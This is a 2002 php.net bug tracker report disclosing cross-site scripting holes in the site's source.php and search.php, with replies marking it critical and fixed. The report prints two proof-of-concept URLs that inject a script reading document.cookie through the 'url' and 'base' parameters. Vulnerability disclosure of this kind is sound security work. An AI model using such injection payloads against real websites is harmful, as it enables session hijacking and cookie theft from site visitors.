php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #16258 Cross-Site scripting in php.net
Submitted: 2002-03-25 08:57 UTC Modified: 2002-03-25 14:23 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: nopman at hackermail dot com Assigned:
Status: Closed Package: Website problem
PHP Version: 4.1.2 OS: Unix
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: nopman at hackermail dot com
New email:
PHP Version: OS:

 

 [2002-03-25 08:57 UTC] nopman at hackermail dot com 
There is a Cross-Site scripting problem in source.php and
search.php.
One can enter following URL:
http://www.php.net/source.php?url=/<script>alert(document.cookie)</script><!--.html
And following will also work:
http://www.php.net/search.php?show=nosource&auto=1&pattern=dfighdfughfg&base="><script>alert(document.cookie)</script><!--

Regards,
NopMan

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-03-25 09:00 UTC] sander@php.net 
Marking as critical.
 [2002-03-25 14:23 UTC] jimw@php.net 
This bug has been fixed in CVS.
 
PHP Copyright © 2001-2026 The PHP Group
All rights reserved. 		Last updated: Thu Jun 18 06:00:02 2026 UTC